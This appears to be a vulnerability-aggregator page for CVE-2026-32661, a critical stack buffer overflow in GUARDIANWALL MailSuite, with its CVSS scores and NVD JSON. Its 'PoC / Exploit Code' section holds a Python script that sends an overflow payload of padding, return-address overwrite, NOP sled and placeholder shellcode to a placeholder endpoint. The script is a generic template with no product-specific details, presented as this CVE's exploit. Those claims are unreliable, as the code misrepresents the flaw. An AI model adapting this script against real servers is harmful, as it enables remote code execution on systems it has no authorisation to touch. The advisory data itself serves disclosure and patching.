Security Vulnerability Report
中文
CVE-2026-32661 CVSS 9.8 CRITICAL

CVE-2026-32661

Published: 2026-05-13 06:16:14
Last Modified: 2026-05-13 15:47:10
Source: [email protected]

Description

Stack-based buffer overflow vulnerability exists in GUARDIANWALL MailSuite and GUARDIANWALL Mail Security Cloud (SaaS version). If a remote attacker sends a specially crafted request to the product's web service, arbitrary code may be executed when the product is configured to run pop3wallpasswd with grdnwww user privilege.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

GUARDIANWALL MailSuite (所有受影响版本请参考厂商公告)
GUARDIANWALL Mail Security Cloud (SaaS) (所有受影响版本请参考厂商公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-32661 Proof of Concept (Conceptual) # This script demonstrates the buffer overflow trigger mechanism. # Note: Offset and Ret addresses need to be adjusted based on the specific target version. import socket import sys def send_exploit(target_ip, target_port): # Constructing the malicious payload # 1. Padding (A's to fill the buffer) padding = b"A" * 1024 # 2. Overwrite EIP/RIP (Example address, needs debugging) eip_overwrite = b"\xaf\x11\x40\x00" # 3. NOP Sled nop_sled = b"\x90" * 32 # 4. Shellcode (Example: calc.exe or bind shell) shellcode = b"\xcc\xcc\xcc\xcc" payload = padding + eip_overwrite + nop_sled + shellcode try: print(f"[*] Connecting to {target_ip}:{target_port}...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_ip, target_port)) # Sending HTTP Request with payload in a vulnerable parameter request = b"POST /vulnerable_endpoint HTTP/1.1\r\n" request += b"Host: " + target_ip.encode() + b"\r\n" request += b"Content-Type: application/x-www-form-urlencoded\r\n" request += b"Content-Length: " + str(len(payload)).encode() + b"\r\n" request += b"\r\n" request += payload s.send(request) print("[+] Payload sent successfully.") s.close() except Exception as e: print(f"[-] Exploit failed: {e}") if __name__ == "__main__": # Replace with actual target IP and Port send_exploit("192.168.1.10", 80)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32661", "sourceIdentifier": "[email protected]", "published": "2026-05-13T06:16:14.253", "lastModified": "2026-05-13T15:47:10.327", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Stack-based buffer overflow vulnerability exists in GUARDIANWALL MailSuite and GUARDIANWALL Mail Security Cloud (SaaS version). If a remote attacker sends a specially crafted request to the product's web service, arbitrary code may be executed when the product is configured to run pop3wallpasswd with grdnwww user privilege."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "references": [{"url": "https://jvn.jp/en/jp/JVN35567473/", "source": "[email protected]"}, {"url": "https://security-support.canon-its.jp/info_and_news/show/804?site_domain=GUARDIANWALL", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.